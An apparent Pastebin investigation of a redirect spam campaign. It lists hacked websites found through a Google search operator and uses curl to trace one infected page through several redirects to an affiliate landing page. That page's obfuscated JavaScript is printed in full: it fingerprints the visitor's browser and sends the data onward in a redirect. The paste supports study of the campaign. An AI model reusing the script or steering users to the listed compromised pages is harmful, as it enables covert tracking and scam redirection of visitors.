Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // =========================================================================================
- // Hacked URLs found via Google, searching for "allinurl:php?teu=" (Aware of Google dorks).
- // -----------------------------------------------------------------------------------------
- // (Don't click them, the pages are still existing!!)
- thegriffinhouse.org/4wut/xhsk5.php?teu=raspbian-web-proxy
- www.raumwert.cc/yw5b/e9ai5.php?teu=mitmproxy...proxy
- haiproject.org/ve7l/orguj.php?teu=raspberry-pi-ssh-tunnel-proxy
- www.mezzbrands.com/dlo3/0cbjc.php?teu=pi-proxy
- www.retire21.org/zr7h/8jpac.php?teu=squid-listen-ipv4
- yadleah.org/owdt/uzdiy.php?teu=privoxy-vs-pi-hole
- kriteri.az/vqfx/67oth.php?teu=deluge-force-proxy
- www.propertify.se/wvbx/kdjck.php?teu=squid-listen-ipv4
- biralabwa.com/cjsp/xrmzo.php?teu=mitmproxy-alternative
- www.zphabiganj.org/nrmv/xgs4c.php?teu=privoxy-vs-pi-hole
- innovativemassagece.com/6dd9/nkfxc.php?teu=ipv6-proxy...
- izabelawojcik.com/cb5l/srkmg.php?teu=tor-server-setup
- loshylimited.com/zkt3/c2g6v.php?teu=deluge-force-proxy
- ...
- // =========================================================================================
- // Curling one infected page:
- // -----------------------------------------------------------------------------------------
- $> curl -v http://proclean-gmbh.de/alf6/nonh0.php\?teu=scam
- * Trying 85.13.131.63...
- * TCP_NODELAY set
- * Connected to proclean-gmbh.de (85.13.131.63) port 80 (#0)
- > GET /alf6/nonh0.php?teu=scam HTTP/1.1
- > Host: proclean-gmbh.de
- > User-Agent: curl/7.54.0
- > Accept: */*
- >
- < HTTP/1.1 302 Moved Temporarily
- < Date: Fri, 02 Feb 2018 21:14:52 GMT
- < Server: Apache
- < Upgrade: h2,h2c
- < Connection: Upgrade
- < Location: http://5.45.79.15/input/?mark=20180202-proclean-gmbh.de/alf6&tpl=9&engkey=scam
- < Transfer-Encoding: chunked
- < Content-Type: text/html
- <
- * Connection #0 to host proclean-gmbh.de left intact
- $> curl -v http://5.45.79.15/input/\?mark\=20180202-proclean-gmbh.de/alf6\&tpl\=9\&engkey\=scam
- * Trying 5.45.79.15...
- * TCP_NODELAY set
- * Connected to 5.45.79.15 (5.45.79.15) port 80 (#0)
- > GET /input/?mark=20180202-proclean-gmbh.de/alf6&tpl=9&engkey=scam HTTP/1.1
- > Host: 5.45.79.15
- > User-Agent: curl/7.54.0
- > Accept: */*
- >
- < HTTP/1.1 302 Found
- < Date: Fri, 02 Feb 2018 21:15:03 GMT
- < Server: Apache/2.2.15 (CentOS)
- < X-Powered-By: PHP/5.6.30
- < Set-Cookie: thevisited=1; expires=Sat, 03-Feb-2018 21:15:03 GMT; Max-Age=86400; path=/; domain=.5.45.79.15
- < Location: http://www.bestphoneapp.net/?sl=2752853-f60b9
- < Content-Length: 0
- < Connection: close
- < Content-Type: text/html; charset=UTF-8
- <
- * Closing connection 0
- $> curl -v http://www.bestphoneapp.net/\?sl\=2752853-f60b9
- * Trying 18.194.70.215...
- * TCP_NODELAY set
- * Connected to www.bestphoneapp.net (18.194.70.215) port 80 (#0)
- > GET /?sl=2752853-f60b9 HTTP/1.1
- > Host: www.bestphoneapp.net
- > User-Agent: curl/7.54.0
- > Accept: */*
- >
- < HTTP/1.1 302 Found
- < Date: Fri, 02 Feb 2018 21:15:12 GMT
- < Content-Type: text/html; charset=UTF-8
- < Transfer-Encoding: chunked
- < Connection: keep-alive
- < Server: nginx
- < Set-Cookie: vidf=czo2NDoiYmRhOGZmMWE5Y2RmMWQ0YzM1ZmZiZTZhOWQzMzY0ZTZhMjZlNjY1NDBmNDM1ZTFhZWRmMGJkMTNlZWYyMmRhNCI7; expires=Thu, 03-May-2018 20:15:12 GMT; Max-Age=7772400; path=/; domain=www.bestphoneapp.net
- < Set-Cookie: vt=506844-1517606112; expires=Sat, 03-Feb-2018 21:15:12 GMT; Max-Age=86400; path=/; domain=bestphoneapp.net
- < Set-Cookie: _s=2752853; expires=Sat, 03-Feb-2018 21:15:12 GMT; Max-Age=86400; path=/; domain=bestphoneapp.net
- < Set-Cookie: rd=YjoxOw%3D%3D; expires=Sat, 03-Feb-2018 21:15:12 GMT; Max-Age=86400; path=/; domain=www.bestphoneapp.net
- < Location: http://d.billyaffcontent.com/d/11685513e11bcfa62?sub=9035500000118074927-201802-54c8d2b8f6&source=4612
- < Referrer-Policy: no-referrer
- <
- * Connection #0 to host www.bestphoneapp.net left intact
- $> curl -v http://d.billyaffcontent.com/d/11685513e11bcfa62\?sub\=9035500000118074927-201802-54c8d2b8f6\&source\=4612
- * Trying 62.212.87.141...
- * TCP_NODELAY set
- * Connected to d.billyaffcontent.com (62.212.87.141) port 80 (#0)
- > GET /d/11685513e11bcfa62?sub=9035500000118074927-201802-54c8d2b8f6&source=4612 HTTP/1.1
- > Host: d.billyaffcontent.com
- > User-Agent: curl/7.54.0
- > Accept: */*
- >
- < HTTP/1.1 200 OK
- < Server: nginx
- < Date: Fri, 02 Feb 2018 21:15:21 GMT
- < Content-Type: text/html
- < Content-Length: 7829
- < Last-Modified: Thu, 25 Jan 2018 16:59:08 GMT
- < ETag: "5a6a0cdc-1e95"
- < Accept-Ranges: bytes
- <
- <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Loading...</title> <link rel="icon" type="image/png" href="data:image/png;base64,iVBORw0KGgo="> <meta name="viewport" content="width=device-width,initial-scale=1"> </head> <body> <div class="void" style="opacity:0;position:absolute;top:-1000px;left:-1000px"> <canvas id="canvas"></canvas> </div> <script>var e=document.querySelector(".void"),m=document.getElementById("canvas");m.width=14;m.height=14;var p=m.getContext("2d");function r(k,h){for(var b=[],c=0;c<k.length;c++)b.push(k[c].charCodeAt(0));var g,d,f;if(0===b.length)return"";d=[0];for(c=0;c<b.length;){for(f=0;f<d.length;)d[f]<<=h?0:8,f++;d[0]+=b[c];for(f=g=0;f<d.length;)d[f]+=g,g=d[f]/58|0,d[f]%=58,++f;for(;g;)d.push(g%58),g=g/58|0;c++}for(c=0;0===b[c]&&c<b.length-1;)d.push(0),c++;b="";d=d.reverse();for(c=0;c<d.length;c++)b+="123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"[d[c]];return b}function v(k){try{return eval(k)}catch(h){return!0}}function w(k,h){var b=document.createElement(h);return"function"==typeof b.canPlayType&&(b=b.canPlayType(k),"maybe"==b.toLowerCase()||"probably"==b.toLowerCase())?!0:!1}!function(k,h,b,c,g,d,f){var n;try{n=function(){function d(a){return"function"==typeof a||!1}var g,n=new Date,q=[function(){return+new Date},function(){return 5},function(){return b.platform},function(){return"ontouchstart"in h||"onmsgesturechange"in h?1:f},function(){return c.availWidth},function(){return c.availHeight},function(){return b.plugins&&b.plugins.length},function(){return(g.ontouchstart+"")[0]},function(){return(h.g+"")[0]},function(){return h.MSGesture?1:f},function(){return h.innerWidth},function(){return h.innerHeight},function(){return n.getTimezoneOffset()},function(){return(new Date).getTime()-n.getTime()},function(){return b.buildID},function(){return b.cookieEnabled?1:f},function(){return b.performance&&b.performance.navigation&&b.performance.navigation.redirectCount||f},function(){return b.performance&&b.performance.navigation&&b.performance.navigation.type||f},function(){return h.orientation},function(){return h.devicePixelRatio},function(){return b.vendor},function(){return c.pixelDepth},function(){return c.colorDepth},function(){return c.deviceXDPI},function(){return c.e},function(){return d(k.hasFocus)?k.hasFocus():f},function(){return d(k.getComputedStyle)?1:f},function(){return h.history&&d(h.history.pushState)?1:f},function(){return c.width},function(){return c.height},function(){return window!=window.top},function(){return b.userAgent},function(){var a=[],b=document.createElement("div");b.innerHTML='<fieldset disabled><input type="text"></fieldset>';a.push(b.querySelector("input:disabled")? 0:1);a.push(v("!MutationObserver")?1:0);a.push(document.d?0:1);a.push("undefined"===typeof document.hidden||"undefined"===typeof document.webkitHidden?1:0);a.push(window.requestAnimationFrame?0:1);a.push(v('(typeof document.createElement("iframe").srcdoc)[0] === "u"')?1:0);return a.join("")},function(){var a=[];a.push(v('typeof window.SpeechSynthesisUtterance === "undefined"')?1:0);a.push(window.HTMLPictureElement?0:1);return a.join("")},function(){var a=[];a.push("undefined"===typeof document.createElement("a").f? 1:0);a.push(w("video/webm","video")?0:1);a.push(w("audio/ogg","audio")?0:1);a.push(v('document.body.querySelector(":nth-child(1 of .foo)")')?0:1);return a.join("")},function(){var a=[];a.push("undefined"===typeof window.openDatabase?1:0);a.push(v('document.querySelector("div:dir(ltr)")')?0:1);a.push("ondeviceproximity"in window?1:0);return a.join("")},function(){var a=[];a.push(window.chrome&&window.chrome.h?1:0);return a.join("")},function(){try{for(var a in b.plugins)if(b.plugins[a].name&&-1<b.plugins[a].name.toString().indexOf("Flash"))return!0}catch(c){}return!1},function(){var a=[];a.push(v('(typeof window.PaymentRequest)[0] === "f"')?1:0);a.push(v('(typeof window.MediaRecorder)[0] === "f"')?1:0);a.push(v('navigator.connection.type[0] === "w" || navigator.connection.type[0] === "c"')?1:0);return a.join("")},function(){var a=[];a.push(v("navigator.language")?1:0);a* Connection #0 to host d.billyaffcontent.com left intact
- .push(v("navigator.userLanguage")?1:0);a.push(v("navigator.browserLanguage")?1:0);a.push(v("navigator.systemLanguage")?1:0);return a.join("")},function(){var a=[];a.push(v("!!window.sessionStorage")? 1:0);a.push(v("!!window.localStorage")?1:0);a.push(v("!!window.indexedDB")?1:0);a.push(v('navigator.hardwareConcurrency ? navigator.hardwareConcurrency : "unknown"')?1:0);a.push(v('navigator.platform ? navigator.platform : "unknown"')?1:0);a.push(v('navigator.doNotTrack ? navigator.doNotTrack : "unknown"')?1:0);a.push(v('navigator.msDoNotTrack ? navigator.msDoNotTrack : "unknown"')?1:0);a.push(v('window.doNotTrack ? window.doNotTrack : "unknown"')?1:0);return a.join("")},function(){var a=0,b=!1;"undefined"!==typeof navigator.b?a=navigator.b:"undefined"!==typeof navigator.c&&(a=navigator.c);try{document.createEvent("TouchEvent"),b=!0}catch(c){}return[a?1:0,b?1:0,"ontouchstart"in window?1:0].join("")},function(){if("undefined"!==typeof navigator.a)try{if(navigator.a[0].substr(0,2)!==navigator.language.substr(0,2))return!0}catch(a){return!0}return!1},function(){return v("navigator.oscpu")},function(){return v("navigator.productSub")},function(){return v("eval.toString().length")},function(){var a=document.createElement("canvas");return!(!a.getContext||!a.getContext("2d"))},function(){return document.referrer},function(){var a="",a=document.createElement("div");a.innerHTML="<style>span{color:rebeccapurple}</style><span>rbcc</span>";e.appendChild(a);return a=getComputedStyle(a.querySelector("span")).color.match(/\d/g).join("")},function(){return v("navigator.connection.type")},function(){var a=[];p.font="12px monospace";p.fillStyle="white";for(var b=["\ud83d\udc58","\ud83d\udc44","\ud83d\udc7e","\ud83d\udcf1"],c=0;4>c;c++)p.clearRect(0,0,14,14),p.fillText(b[c],0,12),a.push(r(m.toDataURL("image/png"),!0));return a.join("")},function(){p.fillStyle="black";var a="Dancing Script;sans-serif-light;sans-serif-condensed-light;Zapfino;Cochin;sans-serif-black;Cambria;serif-monospace;Damascus;sans-serif-smallcaps;Noto Serif;Bookerly;HelveticaNeue;Avenir-Book;ArialMT;Microsoft Sans Serif;Comic Sans;Superclarendon-Regular;Georgia;Open Sans;FreeSans;Algerian;Bookman Old Style;Bitstream Vera Sans;FreeSerif;sans-serif-condensed;AppleSDGothicNeo-Thin;sans-serif-thin;sans-serif-medium;Droid Sans;AppleColorEmoji;Monospace;Webdings;TrebuchetMS;Tahoma;Roboto;Lucida Console;DejaVu Sans;DBLCDTempBlack;Calibri;FreeMono;Lucida;casual;Impact;AlNile-Bold;AmericanTypewriter;Ubuntu;Syncopate;Liberation Serif;Didot;AcademyEngravedLetPlain;Trebuchet;OpenSymbol".split(";");m.width=14*a.length;p.clearRect(0,0,14,14);for(var b=0,c=a.length;b<c;b++)p.font="16px "+a[b],p.fillText("B",14*b,12);return r(m.toDataURL("image/png"),!0)},function(){return window.name},function(){try{var a=document.createElement("canvas").getContext("webgl"),b=a.getExtension("WEBGL_debug_renderer_info");try{return a.getParameter(b.UNMASKED_VENDOR_WEBGL)}catch(c){return 1}}catch(d){return 0}},function(){try{return document.createElement("canvas").getContext("webgl").getSupportedExtensions().length}catch(a){return"0"}}],t=[],u="ctm ver plt tch aw ah crx tchl msgl msg iw ih tz tdff buid cke prfrd prfnv ornt dpr vnd pd cdp dxdp dydp hsfc gcs whst ww wh frm ua a43 a44 sf ff chd flv chm lng strg mxtch mnlng oscpu prdsub evln cnv ref rbcc cntp emjf ttfp wnm wglv wgle".split(" ");for(g=0;g<u.length;++g)try{t.push([u[g],q[g]()].join(""))}catch(x){t.push([u[g],"!"+x.message].join(""))}return t.join("\x00")}()}catch(q){try{n=l([0,q.message||q].join("\x00"))}catch(y){n=""}}window.location.replace(g.replace("/d/","/l/")+r(n))}(document,window,navigator,screen,location.href+(location.href.split("?")[1]?"&":"?")+"code=");</script> </body> </html>% $>
Add Comment
Please, Sign In to add comment